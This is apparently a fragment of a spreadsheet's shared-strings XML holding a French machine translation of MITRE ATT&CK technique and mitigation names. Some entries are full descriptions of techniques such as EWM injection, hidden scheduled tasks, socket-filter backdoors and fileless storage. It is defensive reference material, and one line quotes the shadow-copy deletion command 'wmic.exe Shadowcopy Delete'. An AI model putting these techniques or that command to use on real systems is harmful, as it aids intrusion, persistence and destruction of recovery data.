    <t>Vérifications basées sur l’activité de l’utilisateur</t>
  </si>
  <si>
    <t>Détournement de services cloud</t>
  </si>
  <si>
    <t>Outils de déploiement de logiciels</t>
  </si>
  <si>
    <t>Exfiltration sur le canal C2</t>
  </si>
  <si>
    <t>Usurpation de PID parent</t>
  </si>
  <si>
    <t>Recueillir des informations sur l’organisation des victimes</t>
  </si>
  <si>
    <t>Falsifier les informations d’identification Web</t>
  </si>
  <si>
    <t>Génération de demandes d’authentification multifacteur</t>
  </si>
  <si>
    <t>Binaire du logiciel hôte de compromis</t>
  </si>
  <si>
    <t>Modifier l’association de fichiers par défaut</t>
  </si>
  <si>
    <t>Détournement de VDSO</t>
  </si>
  <si>
    <t>Protocoles de transfert de fichiers</t>
  </si>
  <si>
    <t>Exploitation pour l’accès aux identifiants</t>
  </si>
  <si>
    <t>Émond</t>
  </si>
  <si>
    <t>Communication à sens unique</t>
  </si>
  <si>
    <t>Recueillir des informations sur le réseau des victimes</t>
  </si>
  <si>
    <t>Exploitation des services à distance</t>
  </si>
  <si>
    <t>Spearphishing interne</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de fichiers de services</t>
  </si>
  <si>
    <t>Clés d’exécution du registre/dossier de démarrage</t>
  </si>
  <si>
    <t>Relation de confiance</t>
  </si>
  <si>
    <t>Groupes locaux</t>
  </si>
  <si>
    <t>Recherche de sites Web/domaines ouverts</t>
  </si>
  <si>
    <t>Manipulation de compte</t>
  </si>
  <si>
    <t>Exfiltration par un protocole alternatif</t>
  </si>
  <si>
    <t>Modules et extensions du noyau</t>
  </si>
  <si>
    <t>Capture d’entrée de l’interface graphique</t>
  </si>
  <si>
    <t>Outil</t>
  </si>
  <si>
    <t>Exfiltration via USB</t>
  </si>
  <si>
    <t>Recherche de sources fermées</t>
  </si>
  <si>
    <t>Minuteries Systemd</t>
  </si>
  <si>
    <t>Hameçonnage</t>
  </si>
  <si>
    <t>Fichier HTML compilé</t>
  </si>
  <si>
    <t>Détournement de calcul</t>
  </si>
  <si>
    <t>Suppression de la connexion de partage réseau</t>
  </si>
  <si>
    <t>Proxy multi-sauts</t>
  </si>
  <si>
    <t>Formulaires Outlook</t>
  </si>
  <si>
    <t>Désactiver ou modifier les outils</t>
  </si>
  <si>
    <t>Manipulation des données</t>
  </si>
  <si>
    <t>Communication inter-processus</t>
  </si>
  <si>
    <t>Obscurcissement des données</t>
  </si>
  <si>
    <t>Données du Drive partagé sur le réseau</t>
  </si>
  <si>
    <t>Modifier l’image système</t>
  </si>
  <si>
    <t>Détourner le flux d’exécution</t>
  </si>
  <si>
    <t>Retrait de l’indicateur des outils</t>
  </si>
  <si>
    <t>Image malveillante</t>
  </si>
  <si>
    <t>Service de conteneurs</t>
  </si>
  <si>
    <t>Comptes valides</t>
  </si>
  <si>
    <t>Port non standard</t>
  </si>
  <si>
    <t>Évidage du processus</t>
  </si>
  <si>
    <t>Exploitation à des fins d’élévation de privilèges</t>
  </si>
  <si>
    <t>Recherche de ressources</t>
  </si>
  <si>
    <t>Suppression de l’accès au compte</t>
  </si>
  <si>
    <t>Bourrage d’identifiants</t>
  </si>
  <si>
    <t>Fichiers ou informations obscurcis</t>
  </si>
  <si>
    <t>Authentification multifacteur</t>
  </si>
  <si>
    <t>Collecte d’e-mails à distance</t>
  </si>
  <si>
    <t>Composants IIS</t>
  </si>
  <si>
    <t>Signature de code non valide</t>
  </si>
  <si>
    <t>Exécuter une instance virtuelle</t>
  </si>
  <si>
    <t>Code polymorphe</t>
  </si>
  <si>
    <t>Découverte de la politique de mot de passe</t>
  </si>
  <si>
    <t>Exécution déclenchée par un événement</t>
  </si>
  <si>
    <t>Authentification forcée</t>
  </si>
  <si>
    <t>Injection d’historique SID</t>
  </si>
  <si>
    <t>Franchissement des limites du réseau</t>
  </si>
  <si>
    <t>Données chiffrées pour l’impact</t>
  </si>
  <si>
    <t>Subvertir les contrôles de confiance</t>
  </si>
  <si>
    <t>Exécution élevée avec invite</t>
  </si>
  <si>
    <t>Microprogramme</t>
  </si>
  <si>
    <t>Canal crypté</t>
  </si>
  <si>
    <t>Package d’authentification</t>
  </si>
  <si>
    <t>Régsvr32</t>
  </si>
  <si>
    <t>Exfiltration vers des sites de stockage de texte</t>
  </si>
  <si>
    <t>Logiciel</t>
  </si>
  <si>
    <t>Capture d’entrée</t>
  </si>
  <si>
    <t>Médias sociaux</t>
  </si>
  <si>
    <t>Logiciel de gestion de la relation client</t>
  </si>
  <si>
    <t>Détournement de modèle objet composant</t>
  </si>
  <si>
    <t>Pouvoirs</t>
  </si>
  <si>
    <t>Compromettre la chaîne d’approvisionnement logicielle</t>
  </si>
  <si>
    <t>Renommer les utilitaires système</t>
  </si>
  <si>
    <t>Communication bidirectionnelle</t>
  </si>
  <si>
    <t>Exploitation pour l’exécution par le client</t>
  </si>
  <si>
    <t>Balayage de listes de mots</t>
  </si>
  <si>
    <t>Alertes de sécurité d’usurpation d’identité</t>
  </si>
  <si>
    <t>Page d’accueil Outlook</t>
  </si>
  <si>
    <t>Cryptographie asymétrique</t>
  </si>
  <si>
    <t>Exfiltration vers le stockage en nuage</t>
  </si>
  <si>
    <t>Transfert latéral de l’outil</t>
  </si>
  <si>
    <t>Interception de chemin par chemin non guillemé</t>
  </si>
  <si>
    <t>Installer le certificat numérique</t>
  </si>
  <si>
    <t>Éléments de démarrage</t>
  </si>
  <si>
    <t>Découverte du langage système</t>
  </si>
  <si>
    <t>Protocole de couche non-application</t>
  </si>
  <si>
    <t>Stéganographie</t>
  </si>
  <si>
    <t>Usurpation d’identité de protocole ou de service</t>
  </si>
  <si>
    <t>Registre des requêtes</t>
  </si>
  <si>
    <t>Limites de taille de transfert de données</t>
  </si>
  <si>
    <t>Comptes de domaine</t>
  </si>
  <si>
    <t>Installer le certificat racine</t>
  </si>
  <si>
    <t>Script d’ouverture de session réseau</t>
  </si>
  <si>
    <t>Déni de service du point de terminaison</t>
  </si>
  <si>
    <t>Compiler après la livraison</t>
  </si>
  <si>
    <t>Découverte de l’emplacement du système</t>
  </si>
  <si>
    <t>Piétinement VBA</t>
  </si>
  <si>
    <t>Emplois BITS</t>
  </si>
  <si>
    <t>Imitation</t>
  </si>
  <si>
    <t>Modifier les configurations de Cloud Compute</t>
  </si>
  <si>
    <t>Façade de domaine</t>
  </si>
  <si>
    <t>Empoisonnement du cache ARP</t>
  </si>
  <si>
    <t>Désactiver ou modifier les journaux cloud</t>
  </si>
  <si>
    <t>Découverte de logiciels de sécurité</t>
  </si>
  <si>
    <t>Fenêtre cachée</t>
  </si>
  <si>
    <t>ClicUne fois</t>
  </si>
  <si>
    <t>Déplacer les logiciels malveillants</t>
  </si>
  <si>
    <t>Identifier les rôles</t>
  </si>
  <si>
    <t>Encodage des données</t>
  </si>
  <si>
    <t>DLL AppInit</t>
  </si>
  <si>
    <t>Hameçonnage pour obtenir des informations</t>
  </si>
  <si>
    <t>Détournement de ressources</t>
  </si>
  <si>
    <t>Établir des comptes</t>
  </si>
  <si>
    <t>Obtenir des capacités</t>
  </si>
  <si>
    <t>Économiseur d’écran</t>
  </si>
  <si>
    <t>Politiques d’accès conditionnel</t>
  </si>
  <si>
    <t>Créer une instance Cloud</t>
  </si>
  <si>
    <t>Magasins de gestion des secrets dans le cloud</t>
  </si>
  <si>
    <t>Manipulation des données transmises</t>
  </si>
  <si>
    <t>/etc/passwd et /etc/shadow</t>
  </si>
  <si>
    <t>Agent de lancement</t>
  </si>
  <si>
    <t>Services système</t>
  </si>
  <si>
    <t>Shell de commande Windows</t>
  </si>
  <si>
    <t>Mémoire Proc</t>
  </si>
  <si>
    <t>Acquérir l’accès</t>
  </si>
  <si>
    <t>Corriger l’image du système</t>
  </si>
  <si>
    <t>Billet d’argent</t>
  </si>
  <si>
    <t>Données provenant de référentiels d’informations</t>
  </si>
  <si>
    <t>Persistance évidente</t>
  </si>
  <si>
    <t>Gestionnaire d’informations d’identification Windows</t>
  </si>
  <si>
    <t>Nom du compte Masquerade</t>
  </si>
  <si>
    <t>Ajouts matériels</t>
  </si>
  <si>
    <t>Composant logiciel serveur</t>
  </si>
  <si>
    <t>Destruction des données</t>
  </si>
  <si>
    <t>Encodage non standard</t>
  </si>
  <si>
    <t>Authentification du contrôleur de domaine</t>
  </si>
  <si>
    <t>Transfert de données vers un compte cloud</t>
  </si>
  <si>
    <t>Contrebande HTML</t>
  </si>
  <si>
    <t>Chiffrement réversible</t>
  </si>
  <si>
    <t>Obfuscation de commande</t>
  </si>
  <si>
    <t>Suppression de fichiers</t>
  </si>
  <si>
    <t>Compromis de conduite</t>
  </si>
  <si>
    <t>Déni de service réseau</t>
  </si>
  <si>
    <t>Commande d’administration du cloud</t>
  </si>
  <si>
    <t>Packages d’installation</t>
  </si>
  <si>
    <t>Analyse des blocs IP</t>
  </si>
  <si>
    <t>Injection de modèle</t>
  </si>
  <si>
    <t>Manipulation du jeton d’accès</t>
  </si>
  <si>
    <t>Interception de l’authentification multifacteur</t>
  </si>
  <si>
    <t>Emballage de logiciels</t>
  </si>
  <si>
    <t>Protocoles Web</t>
  </si>
  <si>
    <t>Visuel de base</t>
  </si>
  <si>
    <t>Système de fichiers caché</t>
  </si>
  <si>
    <t>Détournement de RDP</t>
  </si>
  <si>
    <t>Créer un compte</t>
  </si>
  <si>
    <t>Entrées XDG Autostart</t>
  </si>
  <si>
    <t>Découverte de services cloud</t>
  </si>
  <si>
    <t>Découverte du système à distance</t>
  </si>
  <si>
    <t>Découverte des services réseau</t>
  </si>
  <si>
    <t>Propriétés du domaine</t>
  </si>
  <si>
    <t>Découverte de logiciels</t>
  </si>
  <si>
    <t>Tableau de bord du service cloud</t>
  </si>
  <si>
    <t>Stockage local d’unité d’exécution</t>
  </si>
  <si>
    <t>Évasion du débogueur</t>
  </si>
  <si>
    <t>Espace après le nom de fichier</t>
  </si>
  <si>
    <t>Demandes rouvertes</t>
  </si>
  <si>
    <t>Empoisonnement SEO</t>
  </si>
  <si>
    <t>Passez le hachage</t>
  </si>
  <si>
    <t>Exfiltration sur support physique</t>
  </si>
  <si>
    <t>Chargement latéral DLL</t>
  </si>
  <si>
    <t>Transfert d’outil d’entrée</t>
  </si>
  <si>
    <t>Autorisations supplémentaires de délégué d’e-mail</t>
  </si>
  <si>
    <t>Exécution sans serveur</t>
  </si>
  <si>
    <t>Appels système Ptrace</t>
  </si>
  <si>
    <t>Paramètres d’alimentation</t>
  </si>
  <si>
    <t>Résolution dynamique de l’API</t>
  </si>
  <si>
    <t>Protocole de bureau à distance</t>
  </si>
  <si>
    <t>Script d’ouverture de session (Windows)</t>
  </si>
  <si>
    <t>ListePlantation</t>
  </si>
  <si>
    <t>Masquer l’infrastructure</t>
  </si>
  <si>
    <t>Modification de la politique du domaine ou du locataire</t>
  </si>
  <si>
    <t>Traitement des scripts XSL</t>
  </si>
  <si>
    <t>Analyser les bases de données</t>
  </si>
  <si>
    <t>Fichiers et répertoires cachés</t>
  </si>
  <si>
    <t>Créer un instantané</t>
  </si>
  <si>
    <t>Déterminer les emplacements physiques</t>
  </si>
  <si>
    <t>Test de bureau</t>
  </si>
  <si>
    <t>Développer les capacités</t>
  </si>
  <si>
    <t>SNMP (vidage MIB)</t>
  </si>
  <si>
    <t>Lien malveillant</t>
  </si>
  <si>
    <t>Jeton d’accès à l’application</t>
  </si>
  <si>
    <t>Pilote LSASS</t>
  </si>
  <si>
    <t>Exécution du service</t>
  </si>
  <si>
    <t>Verrouillage environnemental</t>
  </si>
  <si>
    <t>Canaux de secours</t>
  </si>
  <si>
    <t>Attributs de fichier NTFS</t>
  </si>
  <si>
    <t>Découverte de l’heure système</t>
  </si>
  <si>
    <t>À</t>
  </si>
  <si>
    <t>Injection de bibliothèque de liens dynamiques</t>
  </si>
  <si>
    <t>Modifier le processus d’authentification</t>
  </si>
  <si>
    <t>Règles Udev</t>
  </si>
  <si>
    <t>Accrochage de l’API d’identification</t>
  </si>
  <si>
    <t>Corruption du micrologiciel</t>
  </si>
  <si>
    <t>Inhiber la récupération du système</t>
  </si>
  <si>
    <t>DLL d’aide Netsh</t>
  </si>
  <si>
    <t>Proxy interne</t>
  </si>
  <si>
    <t>Exécution du proxy de script système</t>
  </si>
  <si>
    <t>Résolveur Dead Drop</t>
  </si>
  <si>
    <t>Données indésirables</t>
  </si>
  <si>
    <t>API de conteneur</t>
  </si>
  <si>
    <t>Procédures stockées SQL</t>
  </si>
  <si>
    <t>Authentification des périphériques réseau</t>
  </si>
  <si>
    <t>Effacement du contenu du disque</t>
  </si>
  <si>
    <t>Applications de messagerie</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non C2 non chiffré</t>
  </si>
  <si>
    <t>Détournement de Dylib</t>
  </si>
  <si>
    <t>Rétrograder l’image système</t>
  </si>
  <si>
    <t>Comptes locaux</t>
  </si>
  <si>
    <t>L’exploitation à des fins d’évasion de défense</t>
  </si>
  <si>
    <t>Exécution du proxy Trusted Developer Utilities</t>
  </si>
  <si>
    <t>Arrêt/redémarrage du système</t>
  </si>
  <si>
    <t>Usurpation d’argument de processus</t>
  </si>
  <si>
    <t>Filtres de socket</t>
  </si>
  <si>
    <t>Prévention des intrusions sur le réseau</t>
  </si>
  <si>
    <t>Limiter l’accès aux ressources sur le réseau</t>
  </si>
  <si>
    <t>Stockage de données à distance</t>
  </si>
  <si>
    <t>Filtrer le trafic réseau</t>
  </si>
  <si>
    <t>Restreindre le contenu Web</t>
  </si>
  <si>
    <t>Limiter l’installation de logiciels</t>
  </si>
  <si>
    <t>Conseils pour les développeurs d’applications</t>
  </si>
  <si>
    <t>Limiter l’installation matérielle</t>
  </si>
  <si>
    <t>Formation des utilisateurs</t>
  </si>
  <si>
    <t>Contrôle de compte d’utilisateur</t>
  </si>
  <si>
    <t>Configuration du système d’exploitation</t>
  </si>
  <si>
    <t>Sauvegarde des données</t>
  </si>
  <si>
    <t>Prévention de l’exécution</t>
  </si>
  <si>
    <t>Protection d’accès aux informations d’identification</t>
  </si>
  <si>
    <t>Autorisations des variables d’environnement</t>
  </si>
  <si>
    <t>Prévention des pertes de données</t>
  </si>
  <si>
    <t>Intégrité privilégiée des processus</t>
  </si>
  <si>
    <t>Ne pas atténuer</t>
  </si>
  <si>
    <t>Pré-compromis</t>
  </si>
  <si>
    <t>Intégrité du démarrage</t>
  </si>
  <si>
    <t>Canal de communication hors bande</t>
  </si>
  <si>
    <t>Segmentation du réseau</t>
  </si>
  <si>
    <t>Programme de renseignements sur les menaces</t>
  </si>
  <si>
    <t>Politiques de mot de passe</t>
  </si>
  <si>
    <t>Prévention du comportement sur Endpoint</t>
  </si>
  <si>
    <t>Gestion des comptes d’utilisateur</t>
  </si>
  <si>
    <t>Restreindre les autorisations de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Gestion des comptes privilégiés</t>
  </si>
  <si>
    <t>Restreindre les autorisations du registre</t>
  </si>
  <si>
    <t>Authentification multifactorielle</t>
  </si>
  <si>
    <t>Configuration logicielle</t>
  </si>
  <si>
    <t>Isolation des applications et sandboxing</t>
  </si>
  <si>
    <t>Protection contre les exploits</t>
  </si>
  <si>
    <t>Configuration d’Active Directory</t>
  </si>
  <si>
    <t>Mettre à jour le logiciel</t>
  </si>
  <si>
    <t>Limiter le chargement de la bibliothèque</t>
  </si>
  <si>
    <t>Désactiver ou supprimer une fonctionnalité ou un programme</t>
  </si>
  <si>
    <t>Politiques d’utilisation du compte</t>
  </si>
  <si>
    <t>Chiffrer les informations sensibles</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans le processus via Extra Window Memory (EWM) afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection EWM est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Avant de créer une fenêtre, les processus graphiques basés sur Windows doivent prescrire ou enregistrer une classe windows, qui stipule l’apparence et le comportement (via les procédures windows, qui sont des fonctions qui gèrent l’entrée/sortie de données). (Citation : Classes de fenêtre Microsoft) L’inscription de nouvelles classes Windows peut inclure une demande d’ajout d’un maximum de 40 octets d’EWM à la mémoire allouée de chaque instance de cette classe. Cet EWM est destiné à stocker des données spécifiques à cette fenêtre et dispose de fonctions d’interface de programmation d’application (API) spécifiques pour définir et obtenir sa valeur. (Citation : Fonction Microsoft GetWindowLong) (Citation : Fonction Microsoft SetWindowLong)
Bien que petit, l’EWM est suffisamment grand pour stocker un pointeur 32 bits et est souvent utilisé pour pointer vers une procédure Windows. Les logiciels malveillants peuvent éventuellement utiliser cet emplacement mémoire dans le cadre d’une chaîne d’attaque qui comprend l’écriture de code dans des sections partagées de la mémoire du processus, la mise en place d’un pointeur vers le code dans EWM, puis l’appel de l’exécution en renvoyant le contrôle d’exécution à l’adresse dans l’EWM du processus.
L’exécution accordée par l’injection EWM peut permettre l’accès à la mémoire du processus cible et éventuellement à des privilèges élevés. L’écriture de charges utiles dans des sections partagées évite également l’utilisation d’appels d’API hautement surveillés tels que &lt;code&gt;WriteProcessMemory&lt;/code&gt; et &lt;code&gt;CreateRemoteThread&lt;/code&gt;. (Citation : Injection de processus élastique juillet 2017) Des échantillons de logiciels malveillants plus sophistiqués peuvent également contourner les mécanismes de protection tels que la prévention de l’exécution des données (DEP) en déclenchant une combinaison de procédures Windows et d’autres fonctions système qui réécriront la charge utile malveillante à l’intérieur d’une partie exécutable du processus cible.  (Citation : MalwareTech Power Loader août 2013) (Citation : WeLiveSecurity Gapz et Redyms mars 2013)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection EWM peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du planificateur de tâches Windows pour effectuer la planification de tâches pour l’exécution initiale ou récurrente de code malveillant. Il existe plusieurs façons d’accéder au planificateur de tâches dans Windows. L’utilitaire [schtasks](https://attack.mitre.org/software/S0111) peut être exécuté directement sur la ligne de commande, ou le planificateur de tâches peut être ouvert via l’interface graphique dans la section Outils d’administration du Panneau de configuration. (Citation : débordement de pile) Dans certains cas, les adversaires ont utilisé un wrapper .NET pour le planificateur de tâches Windows, tandis que les adversaires ont utilisé la bibliothèque Windows netapi32 et [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) pour créer une tâche planifiée. Les adversaires peuvent également utiliser l’applet de commande Powershell « Invoke-CimMethod », qui exploite la classe WMI « PS_ScheduledTask pour créer une tâche planifiée via un chemin d’accès XML. (Citation : Red Canary - Atomic Red Team)
Un adversaire peut utiliser le Planificateur de tâches Windows pour exécuter des programmes au démarrage du système ou de manière planifiée à des fins de persistance. Le planificateur de tâches Windows peut également être utilisé de manière abusive pour effectuer une exécution à distance dans le cadre d’un mouvement latéral et/ou pour exécuter un processus dans le contexte d’un compte spécifié (tel que SYSTEM). À l’instar de [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), les adversaires ont également abusé du planificateur de tâches Windows pour masquer potentiellement l’exécution unique dans le cadre de processus système signés/approuvés. (Citation : ProofPoint Serpent)
Les adversaires peuvent également créer des tâches planifiées « cachées » (c’est-à-dire [Masquer les artefacts](https://attack.mitre.org/techniques/T1564)) qui peuvent ne pas être visibles par les outils de défense et les requêtes manuelles utilisées pour énumérer les tâches. Plus précisément, un adversaire peut masquer une tâche à l’adresse « schtasks /query » et au planificateur de tâches en supprimant la valeur de registre du descripteur de sécurité (SD) associée (lorsque la suppression de cette valeur doit être effectuée à l’aide des autorisations SYSTEM). (Citation : SigmaHQ)(Citation : Tâche planifiée de Tarrask) Les adversaires peuvent également utiliser d’autres méthodes pour masquer des tâches, telles que la modification des métadonnées (par exemple, la valeur « Index ») dans les clés de registre associées. (Citation : Défense contre les attaques de tâches planifiées dans les environnements Windows)
https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent attacher des filtres à une prise réseau pour surveiller, puis activer des portes dérobées utilisées pour la persistance ou la commande et le contrôle. Avec des autorisations élevées, les adversaires peuvent utiliser des fonctionnalités telles que la bibliothèque « libpcap » pour ouvrir des sockets et installer des filtres afin d’autoriser ou d’interdire à certains types de données de passer par le socket. Le filtre peut s’appliquer à tout le trafic passant par l’interface réseau spécifiée (ou à toutes les interfaces si non spécifiées). Lorsque l’interface réseau reçoit un paquet correspondant aux critères de filtrage, des actions supplémentaires peuvent être déclenchées sur l’hôte, telles que l’activation d’un shell inverse.
Pour établir une connexion, un adversaire envoie un paquet contrefait à l’hôte ciblé qui correspond aux critères de filtre installés. (Citation : haking9 libpcap reniflage du réseau) Des adversaires ont utilisé ces filtres de socket pour déclencher l’installation d’implants, effectuer des retours ping et invoquer des shells de commande. La communication avec ces filtres de socket peut également être utilisée conjointement avec le [Protocol Tunneling](https://attack.mitre.org/techniques/T1572). (Citation : filtres exatrack bpf portes dérobées passives)(Citation : Leonardo Turla Penquin, mai 2020)
Les filtres peuvent être installés sur n’importe quelle plate-forme de type Unix avec 'libpcap' installé ou sur des hôtes Windows utilisant 'Winpcap'.  Les adversaires peuvent utiliser soit 'libpcap' avec 'pcap_setfilter', soit la fonction de bibliothèque standard 'setsockopt' avec les options 'SO_ATTACH_FILTER. Étant donné que la connexion de socket n’est pas active tant que le paquet n’est pas reçu, ce comportement peut être difficile à détecter en raison de l’absence d’activité sur un hôte, d’une faible surcharge de processeur et d’une visibilité limitée sur l’utilisation brute du socket.
https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des utilitaires pour compresser et/ou chiffrer les données collectées avant l’exfiltration. De nombreux utilitaires incluent des fonctionnalités permettant de compresser, de chiffrer ou d’empaqueter les données dans un format plus facile et plus sûr à transporter.
Les adversaires peuvent abuser de divers utilitaires pour compresser ou crypter les données avant de les exfiltrer. Certains utilitaires tiers peuvent être préinstallés, tels que &lt;code&gt;tar&lt;/code&gt; sur Linux et macOS ou &lt;code&gt;zip&lt;/code&gt; sur les systèmes Windows. 
Sous Windows, &lt;code&gt;diantz&lt;/code&gt; ou &lt;code&gt; makecab&lt;/code&gt; peuvent être utilisés pour empaqueter les fichiers collectés dans un fichier armoire (.cab). &lt;code&gt;diantz&lt;/code&gt; peut également être utilisé pour télécharger et compresser des fichiers à partir d’emplacements distants (c’est-à-dire [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)). (Référence : diantz.exe_lolbas) &lt;code&gt;xcopy&lt;/code&gt; sous Windows peut copier des fichiers et des répertoires avec une variété d’options. De plus, les adversaires peuvent utiliser [certutil](https://attack.mitre.org/software/S0160) pour encoder en Base64 les données collectées avant l’exfiltration. 
Les adversaires peuvent également utiliser des utilitaires tiers, tels que 7-Zip, WinRAR et WinZip, pour effectuer des activités similaires. (Citation : page d’accueil 7zip)(Citation : Page d’accueil de WinRAR)(Citation : Page d’accueil de WinZip)
https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour contrôler à distance des machines à l’aide de l’informatique de réseau virtuel (VNC).  VNC est un système de partage de bureau indépendant de la plate-forme qui utilise le protocole RFB (« remote framebuffer ») pour permettre aux utilisateurs de contrôler à distance l’affichage d’un autre ordinateur en relayant les entrées d’écran, de souris et de clavier sur le réseau. (Citation : Le protocole Framebuffer à distance)
VNC diffère du [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) car VNC est un logiciel de partage d’écran plutôt qu’un logiciel de partage de ressources. Par défaut, VNC utilise l’authentification du système, mais il peut être configuré pour utiliser des informations d’identification spécifiques à VNC. (Citation : Logiciel MacOS VNC pour le bureau à distance)(Citation : Authentification VNC)
Les adversaires peuvent abuser de VNC pour effectuer des actions malveillantes en tant qu’utilisateur connecté, telles que l’ouverture de documents, le téléchargement de fichiers et l’exécution de commandes arbitraires. Un adversaire pourrait utiliser VNC pour contrôler et surveiller à distance un système afin de collecter des données et des informations afin de pivoter vers d’autres systèmes au sein du réseau. Des bibliothèques/implémentations VNC spécifiques ont également été sensibles aux attaques par force brute et à l’exploitation de l’utilisation de la mémoire. (Citation : Détournement de VNC)(Citation : Connexion racine macOS VNC sans authentification)(Citation : Vulnérabilités VNC)(Citation : Vérification de l’authentification VNC de sécurité offensive)(Citation : Attaque des serveurs VNC PentestLab)(Citation : Bug d’authentification de La Havane)
https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de Windows Management Instrumentation (WMI) pour exécuter des commandes et des charges utiles malveillantes. WMI est conçu pour les programmeurs et constitue l’infrastructure pour la gestion, les données et les opérations sur les systèmes Windows. (Référence : WMI 1-3) WMI est une fonctionnalité d’administration qui fournit un environnement uniforme pour accéder aux composants du système Windows.
Le service WMI permet un accès local et distant, bien que ce dernier soit facilité par les [Services à distance](https://attack.mitre.org/techniques/T1021) tels que [Modèle objet de composant distribué](https://attack.mitre.org/techniques/T1021/003) et [Gestion à distance Windows](https://attack.mitre.org/techniques/T1021/006). (Référence : WMI 1-3) WMI distant sur DCOM fonctionne à l’aide du port 135, tandis que WMI sur WinRM fonctionne sur le port 5985 lors de l’utilisation de HTTP et 5986 pour HTTPS. (Référence : WMI 1-3) (Citation : Mandiant WMI)
Un adversaire peut utiliser WMI pour interagir avec des systèmes locaux et distants et l’utiliser comme moyen d’exécuter divers comportements, tels que la collecte d’informations pour [Discovery](https://attack.mitre.org/tactics/TA0007) ainsi que [Execution](https://attack.mitre.org/tactics/TA0002) de commandes et de charges utiles. (Citation : Mandiant WMI) Par exemple, un adversaire peut abuser de 'wmic.exe' pour supprimer des clichés instantanés avec la commande 'wmic.exe Shadowcopy Delete' (c’est-à-dire, [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)). (Référence : WMI 6)
**Remarque :** 'wmic.exe' est obsolète à partir de janvier 2024, la fonctionnalité WMIC étant « désactivée par défaut » sur Windows 11+. WMIC sera supprimé des versions ultérieures de Windows et remplacé par [PowerShell](https://attack.mitre.org/techniques/T1059/001) en tant qu’interface WMI principale. (Référence : WMI 7,8) En plus de PowerShell et d’outils tels que 'wbemtool.exe', les API COM peuvent également être utilisées pour interagir de manière programmatique avec WMI via C++, .NET, VBScript, etc.
https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de faire des captures d’écran du bureau pour recueillir des informations au cours d’une opération. La fonctionnalité de capture d’écran peut être incluse dans un outil d’accès à distance utilisé dans les opérations post-compromission. Il est également généralement possible de faire une capture d’écran à l’aide d’utilitaires natifs ou d’appels d’API, tels que &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt; ou &lt;code&gt;capture d’écran&lt;/code&gt;. (Citation : CopyFromScreen .NET)(Citation : Logiciel malveillant Mac obsolète)
https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>Les adversaires peuvent stocker des données dans des formats « sans fichier » pour dissimuler les activités malveillantes aux défenses. Le stockage sans fichier peut être défini de manière générale comme tout format autre qu’un fichier. Parmi les exemples courants de stockage sans fichier non volatile dans les systèmes Windows, citons le registre Windows, les journaux d’événements ou le référentiel WMI. (Citation : Microsoft Fileless)(Citation : SecureList sans fichier) Dans les systèmes Linux, les répertoires de mémoire partagée tels que '/dev/shm', '/run/shm', '/var/run' et '/var/lock' peuvent également être considérés comme du stockage sans fichier, car les fichiers écrits dans ces répertoires sont mappés directement à la RAM et ne sont pas stockés sur le disque. (Citation : Binaire élastique exécuté à partir d’un répertoire de mémoire partagée)(Citation : Akami Frog4Shell 2024)(Citation : Aquasec Muhstik Malware 2024)
À l’instar des comportements en mémoire sans fichier tels que [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) et [Process Injection](https://attack.mitre.org/techniques/T1055), le stockage de données sans fichier peut ne pas être détecté par l’antivirus et d’autres outils de sécurité des terminaux qui ne peuvent accéder qu’à des formats de fichiers spécifiques à partir du stockage sur disque. L’exploitation du stockage sans fichier peut également permettre aux adversaires de contourner les protections offertes par les systèmes de fichiers en lecture seule sous Linux. (Citation : Sysdig Fileless Malware 23022)
Les adversaires peuvent utiliser le stockage sans fichier pour dissimuler divers types de données stockées, y compris les charges utiles/le shellcode (potentiellement utilisés dans le cadre de [Persistance](https://attack.mitre.org/tactics/TA0003)) et les données collectées qui n’ont pas encore été exfiltrées de la victime (par exemple, [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). De plus, il est fréquent que les adversaires chiffrent, encodent, épissent ou obscurcissent ces données sans fichier lorsqu’elles sont stockées.
Certaines formes d’activité de stockage sans fichier peuvent créer indirectement des artefacts dans le système de fichiers, mais dans des formats centraux et difficiles à inspecter tels que les fichiers physiques WMI (par exemple, ' %SystemRoot %\System32\Wbem\Repository') ou Registre (par exemple, ' %SystemRoot %\System32\Config'). (Citation : Microsoft Fileless)
https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des scripts exécutés automatiquement lors de l’initialisation du démarrage ou de l’ouverture de session pour établir la persistance. (Citation : Mandiant APT29 Eye Spy Email 22 novembre)(Citation : Anomali Rocke, mars 2019) Les scripts d’initialisation peuvent être utilisés pour exécuter des fonctions administratives, qui peuvent souvent exécuter d’autres programmes ou envoyer des informations à un serveur de journalisation interne. Ces scripts peuvent varier en fonction du système d’exploitation et s’ils sont appliqués localement ou à distance.  
Les adversaires peuvent utiliser ces scripts pour maintenir la persistance sur un seul système. Selon la configuration d’accès des scripts d’ouverture de session, des informations d’identification locales ou un compte administrateur peuvent être nécessaires. 
